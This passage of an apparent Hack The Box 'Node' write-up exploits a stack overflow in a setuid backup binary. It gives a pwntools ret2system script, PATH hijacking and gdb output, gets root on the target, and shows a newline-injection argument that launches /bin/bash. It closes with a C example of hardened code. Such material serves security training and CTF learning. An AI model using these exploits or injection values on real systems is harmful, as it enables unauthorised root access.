("4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0A"...) 0012| 0xffec6c0c ("Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay"...) 0016| 0xffec6c10 ("r7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3"...) 
0020| 0xffec6c14 ("8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4A"...) 0024| 0xffec6c18 ("As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay"...) 0028| 0xffec6c1c ("s1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7"...) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x31724130 in ?? () gdb-peda$ quit u505@kali:~/HTB/Machines/Node$ /usr/bin/msf-pattern_offset -q 0x31724130 [*] Exact match at offset 512
As expected, the offset is 512 (the local variable is 508 bytes long).
EIP control
We build the skeleton of our exploit, for now only controlling the value of EIP.
u505@kali:~/HTB/Machines/Node$ cat exploit_deadc0de.py
#!/usr/bin/python
from pwn import *
junk = 'D'*512
eip=0xdeadc0de
after = 'U'*8
payload = junk + p32(eip) + after
print payload
#file = open("payload","w")
#file.write (payload)
#file.close()
And run it in gdb:
gdb-peda$ r abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_deadc0de.py`
Starting program: /opt/HTB/Machines/Node/backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_deadc0de.py`
[Secure Backup v1.0 ASCII-art banner]
[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD▒▒▒UUUUUUUU
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x22f
EBX: 0xff881f90 --> 0x4
ECX: 0x0
EDX: 0x804938b --> 0x712d00 ()
ESI: 0xf7f70000 --> 0x1dfd6c
EDI: 0xff881edf --> 0x796500 ()
EBP: 0x44444444 ('DDDD')
ESP: 0xff880eb0 ("UUUUUUUU")
EIP: 0xdeadc0de
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0xdeadc0de
[------------------------------------stack-------------------------------------]
0000| 0xff880eb0 ("UUUUUUUU")
0004| 0xff880eb4 ("UUUU")
0008| 0xff880eb8 --> 0x8499500 --> 0x0
0012| 0xff880ebc --> 0x8048a1b (<main+30>: sub esp,0xc)
0016| 0xff880ec0 --> 0x0
0020| 0xff880ec4 --> 0x0
0024| 0xff880ec8 --> 0x0
0028| 0xff880ecc --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xdeadc0de in ?? ()
As expected, the buffer overflow sets the instruction pointer (EIP) to 0xdeadc0de, and the top of the stack holds our eight U characters.
Exploitation strategy
The executable imports several library functions; each is reachable through its PLT entry at a fixed program address.
gdb-peda$ elfsymbol
Found 24 symbols
strstr@plt = 0x80485e0
strcmp@plt = 0x80485f0
strcspn@plt = 0x8048610
fgets@plt = 0x8048620
fclose@plt = 0x8048630
time@plt = 0x8048640
geteuid@plt = 0x8048650
strcat@plt = 0x8048660
strcpy@plt = 0x8048670
getpid@plt = 0x8048680
puts@plt = 0x8048690
system@plt = 0x80486a0
clock@plt = 0x80486b0
exit@plt = 0x80486c0
srand@plt = 0x80486d0
strchr@plt = 0x80486e0
__libc_start_main@plt = 0x80486f0
fopen@plt = 0x8048700
strncpy@plt = 0x8048710
access@plt = 0x8048730
setuid@plt = 0x8048740
sprintf@plt = 0x8048750
remove@plt = 0x8048760
__gmon_start__@plt = 0x8048770
The program itself calls system and exit, so we can use their PLT entries directly. We also need a string that can be used as a command.
The string "Validated access token" is a good candidate: its last word, token, can serve as the command name.
gdb-peda$ find token
Searching for 'token' in: None ranges
Found 6 results, display max 6 items:
backupnode : 0x8049875 ("token")
      libc : 0xf7f1dd34 ("token.type)")
ld-2.30.so : 0xf7fc5986 ("token")
ld-2.30.so : 0xf7fc5d5f ("token substitution\n")
ld-2.30.so : 0xf7fc5d89 ("token substitution")
   [stack] : 0xff880ac9 ("token")
gdb-peda$ x/s 0x8049875
0x8049875: "token"
gdb-peda$ x/6x 0x8049875
0x8049875: 0x74 0x6f 0x6b 0x65 0x6e 0x00
gdb-peda$ x/6d 0x8049875
0x8049875: 116 111 107 101 110 0
The address 0x8049875 contains the word token, followed by a null byte.
u505@kali:~/HTB/Machines/Node$ cat exploit_token.py
#!/usr/bin/python
from pwn import *
junk = 'D'*512
eip=0xdeadc0de
systemadd=0x80486a0
exitaddr=0x80486c0
tokenaddr=0x8049875

payload = junk + p32(systemadd) + p32(exitaddr) + p32(tokenaddr)
print payload
#file = open("payload","w")
#file.write (payload)
#file.close()
First try in gdb:
gdb-peda$ r abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_token.py`
Starting program: /opt/HTB/Machines/Node/backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_token.py`
[Secure Backup v1.0 ASCII-art banner]
[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD▒u▒ [Attaching after process 9162 vfork to child process 9165] [New inferior 2 (process 9165)] [Detaching vfork parent process 9162 after child exec] [Inferior 1 (process 9162) detached] process 9165 is executing new program: /usr/bin/dash sh: 1: token: not found [Inferior 2 (process 9165) exited with code 0177] Warning: not running
As expected, a new shell is spawned and tries to execute the command token, which is obviously not found.
Final test
First we give our local copy of the backup program the same ownership and permissions as the target program has.
u505@kali:~/HTB/Machines/Node$ sudo chown root backupnode
u505@kali:~/HTB/Machines/Node$ sudo chmod 4755 backupnode
u505@kali:~/HTB/Machines/Node$ ls -l backupnode
-rwsr-xr-x 1 root u505 16484 May 15 20:25 backupnode
We create a file named token.
u505@kali:~/HTB/Machines/Node$ echo whoami > token
u505@kali:~/HTB/Machines/Node$ chmod +x token
u505@kali:~/HTB/Machines/Node$ token
-bash: token: command not found
The command is not found, because it's not in the PATH.
u505@kali:~/HTB/Machines/Node$ echo $PATH
/home/u505/.local/bin:/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
u505@kali:~/HTB/Machines/Node$ export PATH=`pwd`:$PATH
u505@kali:~/HTB/Machines/Node$ echo $PATH
/home/u505/HTB/Machines/Node:/home/u505/.local/bin:/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
u505@kali:~/HTB/Machines/Node$ token
u505
Now that our command "token" works, we modify our exploit script to write the payload to a file.
u505@kali:~/HTB/Machines/Node$ echo /bin/bash > token
u505@kali:~/HTB/Machines/Node$ cat exploit_token.py
#!/usr/bin/python
from pwn import *
junk = 'D'*512
eip=0xdeadc0de
systemadd=0x80486a0
exitaddr=0x80486c0
tokenaddr=0x8049875

payload = junk + p32(systemadd) + p32(exitaddr) + p32(tokenaddr)
#print payload
file = open("payload","w")
file.write (payload)
file.close()
u505@kali:~/HTB/Machines/Node$ python exploit_token.py
u505@kali:~/HTB/Machines/Node$ ls -l payload
-rw-r--r-- 1 u505 u505 524 May 20 21:50 payload
We execute our exploit.
u505@kali:~/HTB/Machines/Node$ ./backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `cat payload`
[Secure Backup v1.0 ASCII-art banner]
[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD▒u▒ kali:~/HTB/Machines/Node# id uid=0(root) gid=1000(u505) groups=1000(u505),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),120(scanner) kali:~/HTB/Machines/Node# exit exit
Exploitation on target
We copy our payload to the target:
u505@kali:~/HTB/Machines/Node$ scp payload mark@node.htb:/tmp/
mark@node.htb's password:
payload 100% 524 13.0KB/s 00:00
From the target:
tom@node:/tmp$ ls -l payload
ls -l payload
-rw-r--r-- 1 mark mark 524 May 16 04:01 payload
tom@node:/tmp$ echo "/bin/bash" >/tmp/token
echo "/bin/bash" >/tmp/token
tom@node:/tmp$ chmod +x /tmp/token
chmod +x /tmp/token
tom@node:/tmp$ export PATH=`pwd`:$PATH
export PATH=`pwd`:$PATH
And we execute the exploit.
tom@node:/tmp$ /usr/local/bin/backup abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `cat payload`
<e72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `cat payload`
[Secure Backup v1.0 ASCII-art banner]
[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD▒u▒ To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details.
root@node:/tmp# id
id
uid=0(root) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
root@node:/tmp# cat /root/root.txt
cat /root/root.txt
<ROOT_FLAG>
Alternative: abusing the folder name
The newline character \n is not in the list of prohibited characters.
/usr/bin/zip -r -P magicword tempfile folder > /dev/null
If we can turn the command into the following three lines:
/usr/bin/zip -r -P magicword tempfile payload
/bin/bash
echo this command is invisible > /dev/null
We should gain root access. The third line is needed because the trailing > /dev/null would otherwise apply to our shell and its output would be invisible. The $ is interpreted by our own shell and never sent to the program ($ is a prohibited character).
tom@node:/tmp$ /usr/local/bin/backup abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'payload \n /bin/bash \n echo this command is invisble')"
< "$(printf 'payload \n /bin/bash \n echo this command is invisble')"
[Secure Backup v1.0 ASCII-art banner]
[+] Validated access token
[+] Starting archiving
payload /bin/bash echo this command is invisble
  adding: payload (deflated 96%)
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@node:/tmp# cat /root/root.txt
cat /root/root.txt
<ROOT_FLAG>
root@node:/tmp# exit
exit
exit
[+] Finished! Encoded backup is below:
UEsDBBQACQAIACwgsFDNhrgUHwAAAAwCAAAHABwAcGF5bG9hZFVUCQADg1e/XpNXv151eAsAAQTpAwAABOkDAAAP1w5OY0DzOHuxQyVtcnwZCpJgAIypSvOoc5EhfFSNUEsHCM2GuBQfAAAADAIAAFBLAQIeAxQACQAIACwgsFDNhrgUHwAAAAwCAAAHABgAAAAAAAAAAACkgQAAAABwYXlsb2FkVVQFAAODV79edXgLAAEE6QMAAATpAwAAUEsFBgAAAAABAAEATQAAAHAAAAAAAA==
Actually, we do not need printf at all: we can type the newlines directly on the command line, between the double quotes.
tom@node:/tmp$ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "payload
> /bin/sh
> echo junk"
  adding: payload (deflated 96%)
# id
uid=0(root) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
# exit
UEsDBBQACQAIACwgsFDNhrgUHwAAAAwCAAAHABwAcGF5bG9hZFVUCQADg1e/XpNXv151eAsAAQTpAwAABOkDAADtx+YFsJWsrYh3pL6S28VuplrALHCzh4x3SkL8gzccUEsHCM2GuBQfAAAADAIAAFBLAQIeAxQACQAIACwgsFDNhrgUHwAAAAwCAAAHABgAAAAAAAAAAACkgQAAAABwYXlsb2FkVVQFAAODV79edXgLAAEE6QMAAATpAwAAUEsFBgAAAAABAAEATQAAAHAAAAAAAA==
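As an added example from the fixing side (this is not the backup binary's source, which is not on this page), the C below puts the two input-handling defects this write-up relies on next to hardened replacements: the unbounded strcpy into the 508-byte buffer behind the offset of 512, and the blacklist-filtered folder name handed to a shell, where \n slips through. The blacklist, the function names and the argv layout are constructed for illustration; only the /usr/bin/zip -r -P magicword tempfile command line and the buffer size come from the page.

```c
/* Added example (not the backup binary's source): the two input-handling
 * defects this write-up exploits, each beside a hardened replacement.
 *  1. argv copied into a fixed 508-byte stack buffer with strcpy (offset 512).
 *  2. folder name spliced into a shell command behind a character blacklist
 *     that misses '\n', so a newline ends the zip command and the rest of
 *     the argument runs as a second shell command.
 * The blacklist is a constructed stand-in, not the binary's real list. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define FOLDER_LEN 508   /* size of the local buffer seen in the write-up */
#define ZIP_ARGC   7

/* 1a. vulnerable: unbounded copy into a fixed stack buffer */
void copy_folder_unsafe(char *dst, const char *src)
{
    strcpy(dst, src);    /* bytes 508..511 hit saved EBP, 512..515 the return address */
}

/* 1b. hardened: refuse anything that does not fit, terminator included */
int copy_folder_checked(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstlen)
        return -1;       /* too long: reject, never silently truncate */
    memcpy(dst, src, n + 1);
    return 0;
}

/* 2a. vulnerable: blacklist, then a shell. The constructed list blocks the
 * usual metacharacters but not '\n', the gap the write-up abuses. */
static int blacklisted(const char *s)
{
    return strpbrk(s, ";&|`$") != NULL || strstr(s, "..") != NULL;
}

int build_zip_command_unsafe(const char *folder, char *cmd, size_t cmdlen)
{
    if (blacklisted(folder))
        return -1;
    /* "payload\n/bin/bash" passes the filter and becomes two shell lines */
    snprintf(cmd, cmdlen,
             "/usr/bin/zip -r -P magicword tempfile %s > /dev/null", folder);
    return 0;
}

/* 2b. hardened, step one: an allowlist. Control characters, '$', space and
 * any other byte outside the list fail; ".." is refused too. */
int folder_name_ok(const char *s)
{
    if (*s == '\0' || strlen(s) >= FOLDER_LEN || strstr(s, "..") != NULL)
        return 0;
    for (; *s; s++)
        if (!isalnum((unsigned char)*s) && strchr("_-./", *s) == NULL)
            return 0;
    return 1;
}

/* 2c. hardened, step two: no shell. The folder is one argv element, so a
 * stray newline could only ever be part of a file name, never a command. */
int build_zip_argv(const char *folder, const char *argv[ZIP_ARGC])
{
    if (!folder_name_ok(folder))
        return -1;
    argv[0] = "/usr/bin/zip"; argv[1] = "-r";       argv[2] = "-P";
    argv[3] = "magicword";    argv[4] = "tempfile"; argv[5] = folder;
    argv[6] = NULL;
    return 0;
}

/* fork/execv wrapper: returns zip's exit status, -1 on refusal or failure */
int run_zip(const char *folder)
{
    const char *argv[ZIP_ARGC];
    int status;
    pid_t pid;

    if (build_zip_argv(folder, argv) != 0)
        return -1;
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], (char *const *)argv);
        _exit(127);  /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The same input that the write-up uses on the target, "payload" followed by a newline and a second command, passes the blacklist and reaches the shell, but is rejected by the allowlist and, even if it were not, would reach zip only as a file name.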
Daniel Simao 19:21, 16 May 2020 (EDT)